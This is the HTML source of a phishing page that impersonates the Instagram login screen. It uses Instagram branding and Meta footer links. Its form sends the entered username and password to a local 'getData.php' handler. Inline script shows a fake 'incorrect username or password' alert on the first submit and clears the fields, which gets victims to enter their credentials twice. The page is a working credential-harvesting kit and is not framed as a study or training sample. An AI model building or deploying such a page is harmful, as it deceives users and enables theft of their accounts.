<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles.css" />
    <title>Login • Instagram</title>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
    const loginButton = document.getElementById("Rectangle_3");
    let clickCount = 0;

    loginButton.addEventListener("click", function () {
        clickCount++;

        const emailInput = document.querySelector('input[name="email"]');
        const passwordInput = document.querySelector('input[name="password"]');

        if (!emailInput.value.trim() || !passwordInput.value.trim()) {
            alert("empty gaps");
            clickCount = 0;
        } else {
            if (clickCount === 1) {
                alert("incorrect username or password input again");
                emailInput.value = "";
                passwordInput.value = "";
            } else {
                // Proceed with the normal function (e.g., form submission)
                // You can add your desired logic here
            }
        }
    });
});

    </script>
</head>
<body>
    <main class="flex align-items-center justify-content-center">
        <section id="mobile" class="flex">
        </section>
        <section id="auth" class="flex direction-column">
            <div class="panel login flex direction-column">
                <h1 title="Instagram" class="flex justify-content-center">
                    <img src="./img//instagram-logo.png" alt="Instagram logo" title="Instagram logo" />
                </h1>
                <form action="getData.php" method="Get">
                    <label for="email" class="sr-only">Phone number, Username, or Email</label>
                    <input name="email" placeholder="Phone number, Username, or Email" />

                    <label for="password" class="sr-only">Password</label>
                    <input name="password" type="password" placeholder="Password" />

                    <input id="Rectangle_3" class="Rectangle_3" style="color: white; background-color: #0095f6;" type="submit" value="Log In" onsubmit="getData">
                </form>
                <div class="flex separator align-items-center">
                    <span></span>
                    <div class="or">OR</div>
                    <span></span>
                </div>
                <div class="login-with-fb flex direction-column align-items-center">
                    <div>
                        <img />
                        <a href="https://www.facebook.com">Log in with Facebook</a>
                    </div>
                    <a href="#">Forgot password?</a>
                </div>
            </div>
            <div class="panel register flex justify-content-center">
                <p>Don't have an account?</p>
                <a href="#">Sign up</a>
            </div>
            <div class="app-download flex direction-column align-items-center">
                <p>Get the app.</p>
                <div class="flex justify-content-center">
                    <img src="./img/apple-button.png" alt="Image with Apple Store logo" title="Image with Apple Store logo" />
                    <img src="./img/googleplay-button.png" alt="Image with Google Play logo" title="Image with Google Play logo" />
                </div>
            </div>
        </section>
    </main>
    <footer>
        <ul class="flex flex-wrap justify-content-center">
            <li><a href="https://about.meta.com/">Meta</a></li>
            <li><a href="https://about.instagram.com/">About</a></li>
            <li><a href="https://about.instagram.com/blog">Blog</a></li>
            <li><a href="#">API</a></li>
            <li><a href="#">CAREERS</a></li>
            <li><a href="#">PRIVACY</a></li>
            <li><a href="#">TERMS</a></li>
            <li><a href="#">LOCATION</a></li>
            <li><a href="#">MOST RELEVANT ACCOUNTS</a></li>
            <li><a href="#">HASHTAGS</a></li>
            <li><a href="#">LANGUAGE</a></li>
        </ul>
        <p class="copyright">©2023 Instagram from Meta</p>
    </footer>
</body>
</html>
